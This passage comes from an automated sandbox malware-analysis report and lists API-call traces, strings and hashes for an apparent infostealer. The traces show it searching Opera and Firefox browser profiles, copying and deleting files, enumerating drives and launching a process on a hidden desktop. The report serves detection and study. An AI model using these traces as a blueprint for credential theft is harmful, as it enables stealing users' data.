                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A16B65
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A16B7A
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A16BBF
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A16BD1
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A16BE6
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A16BFF
                                                                                                                                                                                                                                                                                                                                                          • PathMatchSpecA.SHLWAPI(?,00000000), ref: 02A16C14
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,02A37A68,02A3766F), ref: 02A16CCD
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A16CDD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13DFD: CreateFileA.KERNEL32(02A16CE9,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,02A16CE9,?), ref: 02A13E18
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A16CF3
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 02A16CFE
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A16D24
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 02A16E42
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A16E62
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A08E2B
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A08E44
                                                                                                                                                                                                                                                                                                                                                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 02A08E5D
                                                                                                                                                                                                                                                                                                                                                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 02A08E79
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A08E99
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A08EAE
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A08EC1
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A3821C), ref: 02A08ED3
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A08EE2
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A08F13
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A08F30
                                                                                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 02A08F8B
                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 02A08F9A
                                                                                                                                                                                                                                                                                                                                                          • CloseDesktop.USER32(?), ref: 02A08FCF
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _memset$Desktoplstrcat$Create$CloseOpenProcessSleeplstrcpywsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: ChromeBuildTools$D$OCALAPPDATA
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3792893142-3777181503
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fa2d0470f6f5ffa0194648c67e5019ba03583b60a4e7285aa2623113b5096537
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 59337d9bc39d044fbddd53ab0531f5b255c5654b14ddbc3efd08ff80db569a8b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa2d0470f6f5ffa0194648c67e5019ba03583b60a4e7285aa2623113b5096537
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A512DB1D4022CAFDB21DFA4DD85FDABBBDBB08314F4004A5BA09E2150DA749F958F61
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,02A3BBC8,02A3BBCC,02A37AC2,02A37ABF,02A1953D,?,00000000), ref: 02A01F94
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A3BBD0), ref: 02A01FC7
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A3BBD4), ref: 02A01FE1
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,02A3BBD8,02A3BBDC,?,02A3BBE0,02A37AC3), ref: 02A020CD
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A022B3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A02326
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 02A02392
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A023A6
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A025CC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0263F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: Sleep.KERNEL32(000003E8,?,?), ref: 02A18C4D
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 02A026B6
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A026CA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A139EE: GetFileAttributesA.KERNEL32(?,?,?,02A0EA72,?,?,?), ref: 02A139F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1475085387-1173974218
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c40353e2537e286411c95a1cf6924c2b35c5568a7c13eba661f2fd42e1b9bc6c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 91775323cb13913a5e6a7f45d6221ef7f5598ddfd91b3c0449abc0ea62517dc5
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c40353e2537e286411c95a1cf6924c2b35c5568a7c13eba661f2fd42e1b9bc6c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A032A731D812299BDB21EB25EE89BCDB37AAF04354F4105E1AD4877160DF71AF898F81
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FileFind$_mbscmpwsprintf$CloseFirstFolderNextOperationPath_ismbcupper_splitpath
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 102359269-2848263008
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3ec9b24766a0e436cbe68c217cdb9883fc32d576ca5e0580cd38d3a2de90cc3f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a8ecf0e4aaf6b43fc2ff4c56fab576af393bbd9285ccc0174d8706af0839c2e4
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ec9b24766a0e436cbe68c217cdb9883fc32d576ca5e0580cd38d3a2de90cc3f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6951C37194065C5FEB11DB68EC88BEABBADBB08311F1449F6E549E3140EF30DA998F50
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A171A5
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 02A171BC
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A37AC0), ref: 02A171DD
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A37AC4), ref: 02A171F7
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A17248
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A1725B
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A1726F
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17282
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A37AC8), ref: 02A17294
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A172A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 02A1735E
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A17372
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Yara matches
Similarity
• API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
• String ID: %s\%s
• API String ID: 1150833511-4073750446
• Opcode ID: 29a08573659e6bf5fbbb68da0bea3a60394aa7032463ee78fe79ff0eebc7e1fe
• Instruction ID: f73669f363b0f8d37bf267750274bfc35d537d054c05c45a8a34bfb82076b581
• Opcode Fuzzy Hash: 29a08573659e6bf5fbbb68da0bea3a60394aa7032463ee78fe79ff0eebc7e1fe
• Instruction Fuzzy Hash: A7511FB5D4021C9BDF60DB64DD89BC9BBB9AB09310F0005E5EB09E3100EB319B95CF65
APIs
  • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
  • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
  • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
  • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
  • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
  • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
  • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
• FindFirstFileA.KERNEL32(?,?,\*.*,02A378EE,02A0DC21,?,?), ref: 02A0CF0E
• StrCmpCA.SHLWAPI(?,02A38638), ref: 02A0CF2E
• StrCmpCA.SHLWAPI(?,02A3863C), ref: 02A0CF48
• StrCmpCA.SHLWAPI(?,Opera,02A3790D,02A37907,02A37906,02A37903,02A378F3,02A378F2,02A378EF), ref: 02A0CFD4
• StrCmpCA.SHLWAPI(?,Opera GX), ref: 02A0CFE2
• StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 02A0CFF0
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
Similarity
• API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
• String ID: Opera$Opera Crypto$Opera GX$\*.*
• API String ID: 2567437900-1710495004
• Opcode ID: 1eb8739e784751feb9ba14c68aab54457c91f99375a685e18e2dec05610a8655
• Instruction ID: ba6818e05c4dd3631b397b43ce15fcff701e3fd6783678b0f2bc687bf93f1595
• Opcode Fuzzy Hash: 1eb8739e784751feb9ba14c68aab54457c91f99375a685e18e2dec05610a8655
• Instruction Fuzzy Hash: F302C732D802299BDB61FB25EE85BCDB3B6AF44350F4105E1AD48B3150DF71AF998E81
APIs
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 02A16EFF
• _memset.LIBCMT ref: 02A16F22
• GetDriveTypeA.KERNEL32(?), ref: 02A16F2B
• lstrcpy.KERNEL32(?,?), ref: 02A16F4B
• lstrcpy.KERNEL32(?,?), ref: 02A16F65
  • Part of subcall function 02A16A05: wsprintfA.USER32 ref: 02A16A59
  • Part of subcall function 02A16A05: FindFirstFileA.KERNEL32(?,?), ref: 02A16A70
  • Part of subcall function 02A16A05: _memset.LIBCMT ref: 02A16A8C
  • Part of subcall function 02A16A05: _memset.LIBCMT ref: 02A16A9D
  • Part of subcall function 02A16A05: StrCmpCA.SHLWAPI(?,02A37A38), ref: 02A16ABE
  • Part of subcall function 02A16A05: StrCmpCA.SHLWAPI(?,02A37A3C), ref: 02A16AD8
  • Part of subcall function 02A16A05: wsprintfA.USER32 ref: 02A16AFF
  • Part of subcall function 02A16A05: StrCmpCA.SHLWAPI(?,02A3766E), ref: 02A16B13
  • Part of subcall function 02A16A05: wsprintfA.USER32 ref: 02A16B3C
  • Part of subcall function 02A16A05: _memset.LIBCMT ref: 02A16B65
  • Part of subcall function 02A16A05: lstrcat.KERNEL32(?,?), ref: 02A16B7A
• lstrcpy.KERNEL32(?,00000000), ref: 02A16F85
• lstrlen.KERNEL32(?), ref: 02A16FFF
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 441469471-147700698
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cfe5bdc0457994e9862cd5dbc8fd5d62b22388a0baeea006cc37c4bde30a4636
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8afb26fc0f09e049f9323056e174d4b98d97c6d1f9ebd1197ec70f915831cfd0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfe5bdc0457994e9862cd5dbc8fd5d62b22388a0baeea006cc37c4bde30a4636
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 175149B1D40258AFDF319FA0CD84BDABBB9FF05314F0045A5EA48A2101EB319E99CF15
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,02A38738,02A3796F,?,?,?), ref: 02A0E63A
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A3873C), ref: 02A0E65B
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A38740), ref: 02A0E675
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,prefs.js,02A38744,?,02A3797D), ref: 02A0E701
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0E7DB
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0E8A6
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 02A0E949
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A0E95D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: prefs.js
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 893096357-3783873740
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4887ad78a432f78a9208d2e359e800776e50086fd053219cc6b3cafa29d55fe1
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 72bbdc06703e844696db985d156f9809f10a5016e1716e686b83c5d534d9da6c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4887ad78a432f78a9208d2e359e800776e50086fd053219cc6b3cafa29d55fe1
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26A1C931D402689BDB60EB24EE85BCDB7B6AF45350F4105A1AD48B7250DF31AF998F81
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,02A385EC,02A378BB,?,?,?), ref: 02A0C5A0
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A385F0), ref: 02A0C5C1
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A385F4), ref: 02A0C5DB
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A385F8,?,02A378BF), ref: 02A0C668
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A0C6C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0BB2E: CopyFileA.KERNEL32(?,?,00000001), ref: 02A0BBD3
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 02A0C834
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A0C848
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3801961486-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 360136f33e2da255b8c5b212acb62376620902e25c4839c866b9177e25907ddd
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 85ee012a42d6617276ff40918b639562ad939e239bc4d10431250b55c69da372
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 360136f33e2da255b8c5b212acb62376620902e25c4839c866b9177e25907ddd
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 728111319401689BDB20FB34EE85BDD77B5AB08360F4106A1ED48A3150EF30EF598ED1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 02A142F8
                                                                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02A1431A
                                                                                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 02A1432A
